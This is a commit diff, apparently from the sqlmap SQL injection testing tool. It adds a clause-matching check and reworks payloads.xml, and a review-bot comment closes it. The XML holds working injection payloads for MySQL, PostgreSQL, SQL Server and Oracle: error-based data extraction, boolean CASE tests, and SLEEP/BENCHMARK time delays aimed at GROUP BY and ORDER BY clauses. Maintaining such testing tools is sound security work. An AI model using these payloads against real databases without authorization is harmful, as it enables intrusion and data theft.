

Commit 4dec049

committed
Major bug fix for test on ORDER BY and GROUP BY clauses.
Minor bug fix: skip subsequent tests if they do not match any of the clauses previously identified (injection.clause value).
1 parent 827a0ae commit 4dec049

3 files changed

Lines changed: 49 additions & 50 deletions


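--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -94,6 +94,7 @@ def checkSqlInjection(place, parameter, value):
     for test in conf.tests:
         title = test.title
         stype = test.stype
+        clause = test.clause
 
         # Skip test if the risk is higher than the provided (or default)
         # value
@@ -145,6 +146,22 @@ def checkSqlInjection(place, parameter, value):
             logger.debug(debugMsg)
             continue
 
+        # Skip test if it does not match the same SQL injection clause
+        # already identified by another test
+        # Parse test's <clause>
+        clauseMatch = False
+
+        for clauseTest in clause:
+            if injection.clause is not None and clauseTest in injection.clause:
+                clauseMatch = True
+                break
+
+        if clause != [ 0 ] and injection.clause and not clauseMatch:
+            debugMsg = "skipping test '%s' because the clause " % title
+            debugMsg += "differs from the clause already identified"
+            logger.debug(debugMsg)
+            continue
+
         infoMsg = "testing '%s'" % title
         logger.info(infoMsg)
 
@@ -340,6 +357,7 @@ def checkSqlInjection(place, parameter, value):
                     injection.ptype = ptype
                     injection.prefix = prefix
                     injection.suffix = suffix
+                    injection.clause = clause
 
                     if "epayload" in test:
                         epayload = "%s%s" % (test.epayload, comment)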
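--- a/lib/core/datatype.py
+++ b/lib/core/datatype.py
@@ -70,6 +70,7 @@ def injectionDict():
     injection.ptype = None
     injection.prefix = None
     injection.suffix = None
+    injection.clause = None
 
     # data is a dict with stype as key and a tuple as value with
     # title, where, comment and reqPayload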
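--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -393,16 +393,6 @@ Formats:
     </boundary>
     <!-- End of WHERE clause boundaries -->
 
-    <!-- GROUP BY and ORDER BY clauses boundaries -->
-    <boundary>
-        <level>2</level>
-        <clause>2,3</clause>
-        <where>1,2</where>
-        <ptype>1</ptype>
-        <prefix>,</prefix>
-        <suffix></suffix>
-    </boundary>
-    <!-- End of GROUP BY and ORDER BY clauses boundaries -->
 
     <!-- Login forms to use with OR-based tests boundaries -->
     <boundary>
@@ -604,16 +594,6 @@ Formats:
         <suffix></suffix>
         <comment>--</comment>
     </boundary>
-
-    <boundary>
-        <level>2</level>
-        <clause>2,3</clause>
-        <where>1,2</where>
-        <ptype>1</ptype>
-        <prefix>,</prefix>
-        <suffix></suffix>
-        <comment>--</comment>
-    </boundary>
     <!-- End of login forms to use with OR-based tests boundaries -->
 
 
@@ -662,10 +642,10 @@ Formats:
         <where>1</where>
         <epayload></epayload>
         <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
+            <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</payload>
         </request>
         <response>
-            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</comparison>
+            <comparison>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM information_schema.tables) END))</comparison>
         </response>
         <details>
             <dbms>MySQL</dbms>
@@ -682,10 +662,10 @@ Formats:
         <where>1</where>
         <epayload></epayload>
         <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
+            <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
         </request>
         <response>
-            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
+            <comparison>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</comparison>
         </response>
         <details>
             <dbms>MySQL</dbms>
@@ -701,10 +681,10 @@ Formats:
         <where>1</where>
         <epayload></epayload>
         <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
+            <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
         </request>
         <response>
-            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
+            <comparison>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</comparison>
         </response>
         <details>
             <dbms>Microsoft SQL Server</dbms>
@@ -720,10 +700,10 @@ Formats:
         <where>1</where>
         <epayload></epayload>
         <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload>
+            <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</payload>
         </request>
         <response>
-            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</comparison>
+            <comparison>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END) FROM DUAL)</comparison>
         </response>
         <details>
             <dbms>Oracle</dbms>
@@ -741,10 +721,10 @@ Formats:
         <where>1</where>
         <epayload></epayload>
         <request>
-            <payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))</payload>
+            <payload>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/0 END))</payload>
         </request>
         <response>
-            <comparison>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END))</comparison>
+            <comparison>, (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/0 END))</comparison>
         </response>
     </test>
 
@@ -1046,15 +1026,15 @@ Formats:
 
     <!-- Error-based tests - GROUP BY and ORDER BY clauses -->
     <test>
-        <title>MySQL &gt;= 5.0 error-based - GROUP BY and ORDER BY clauses</title>
+        <title>MySQL &gt;= 5.0 error-based - GROUP BY and ORDER BY clauses (append)</title>
         <stype>2</stype>
         <level>3</level>
         <risk>0</risk>
         <clause>2,3</clause>
         <where>1</where>
-        <epayload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</epayload>
+        <epayload>, (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(%s),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</epayload>
         <request>
-            <payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
+            <payload>, (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)</payload>
         </request>
         <response>
             <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -1066,15 +1046,15 @@ Formats:
     </test>
 
     <test>
-        <title>PostgreSQL error-based - GROUP BY and ORDER BY clauses</title>
+        <title>PostgreSQL error-based - GROUP BY and ORDER BY clauses (append)</title>
         <stype>2</stype>
         <level>3</level>
         <risk>0</risk>
         <clause>2,3</clause>
         <where>1</where>
-        <epayload>(CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC))</epayload>
+        <epayload>, (CAST('[DELIMITER_START]'||(%s)::text||'[DELIMITER_STOP]' AS NUMERIC))</epayload>
         <request>
-            <payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
+            <payload>, (CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>
         </request>
         <response>
             <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -1085,15 +1065,15 @@ Formats:
     </test>
 
     <test>
-        <title>Microsoft SQL Server/Sybase error-based - ORDER BY clause</title>
+        <title>Microsoft SQL Server/Sybase error-based - ORDER BY clause (append)</title>
         <stype>2</stype>
         <level>3</level>
         <risk>0</risk>
         <clause>3</clause>
         <where>1</where>
-        <epayload>(CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')))</epayload>
+        <epayload>, (CONVERT(INT,('[DELIMITER_START]'+(%s)+'[DELIMITER_STOP]')))</epayload>
         <request>
-            <payload>(CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
+            <payload>, (CONVERT(INT,('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>
         </request>
         <response>
             <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -1104,15 +1084,15 @@ Formats:
     </test>
 
     <test>
-        <title>Oracle error-based - ORDER BY clause</title>
+        <title>Oracle error-based - ORDER BY clause (append)</title>
         <stype>2</stype>
         <level>3</level>
         <risk>0</risk>
         <clause>3</clause>
         <where>1</where>
-        <epayload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</epayload>
+        <epayload>, (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((%s),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</epayload>
         <request>
-            <payload>(SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
+            <payload>, (SELECT UPPER(XMLType(CHR(60)||'[DELIMITER_START]'||(REPLACE((SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL),CHR(32),CHR(58)||CHR(95)||CHR(58)))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>
         </request>
         <response>
             <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
@@ -1123,7 +1103,7 @@ Formats:
     </test>
 
     <test>
-        <title>MySQL &gt;= 5.0 error-based - GROUP BY and ORDER BY clauses</title>
+        <title>MySQL &gt;= 5.0 error-based - GROUP BY and ORDER BY clauses (replace)</title>
         <stype>2</stype>
         <level>4</level>
         <risk>0</risk>
@@ -1143,7 +1123,7 @@ Formats:
     </test>
 
     <test>
-        <title>PostgreSQL error-based - GROUP BY and ORDER BY clauses</title>
+        <title>PostgreSQL error-based - GROUP BY and ORDER BY clauses (replace)</title>
         <stype>2</stype>
         <level>4</level>
         <risk>0</risk>
@@ -1162,7 +1142,7 @@ Formats:
     </test>
 
     <test>
-        <title>Microsoft SQL Server/Sybase error-based - ORDER BY clause</title>
+        <title>Microsoft SQL Server/Sybase error-based - ORDER BY clause (replace)</title>
         <stype>2</stype>
         <level>4</level>
         <risk>0</risk>
@@ -1181,7 +1161,7 @@ Formats:
     </test>
 
     <test>
-        <title>Oracle error-based - ORDER BY clause</title>
+        <title>Oracle error-based - ORDER BY clause (replace)</title>
         <stype>2</stype>
         <level>4</level>
         <risk>0</risk>
@@ -1437,7 +1417,7 @@ Formats:
         <stype>5</stype>
         <level>1</level>
         <risk>1</risk>
-        <clause>1</clause>
+        <clause>1,2,3</clause>
         <where>1</where>
         <epayload>AND IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</epayload>
         <request>
@@ -1457,7 +1437,7 @@ Formats:
         <stype>5</stype>
         <level>2</level>
         <risk>1</risk>
-        <clause>1</clause>
+        <clause>1,2,3</clause>
         <where>1</where>
         <epayload>AND IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</epayload>
         <request>
@@ -1525,7 +1505,7 @@ Formats:
         <stype>5</stype>
         <level>2</level>
         <risk>3</risk>
-        <clause>1</clause>
+        <clause>1,2,3</clause>
         <where>1</where>
         <epayload>OR IF((%s), [RANDNUM], SLEEP([SLEEPTIME]))</epayload>
         <request>
@@ -1545,7 +1525,7 @@ Formats:
         <stype>5</stype>
         <level>3</level>
         <risk>3</risk>
-        <clause>1</clause>
+        <clause>1,2,3</clause>
         <where>1</where>
         <epayload>OR IF((%s), [RANDNUM], BENCHMARK(5000000, MD5('[SLEEPTIME]'))</epayload>
         <request>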
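Review bot: With the `<prefix>,</prefix>` boundaries removed in the first two hunks, the leading `, ` is now repeated by hand inside every `<payload>`, `<epayload>` and `<comparison>` of the "(append)" tests, so each test's three strings must be kept in lockstep; a `<payload>` edited without its `<comparison>` would silently stop matching. A comment above the first such test, e.g. `<!-- "(append)" tests carry their own leading comma: the GROUP BY/ORDER BY boundary with <prefix>,</prefix> no longer exists -->`, would record the convention for the next editor. The last four hunks widen the time-based tests from `<clause>1</clause>` to `<clause>1,2,3</clause>` while their `<epayload>` still begins with `AND IF(` / `OR IF(`, and the commit message does not mention this; a short note on why those payloads are expected to apply in GROUP BY and ORDER BY positions would help, since it is not obvious from this file alone.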
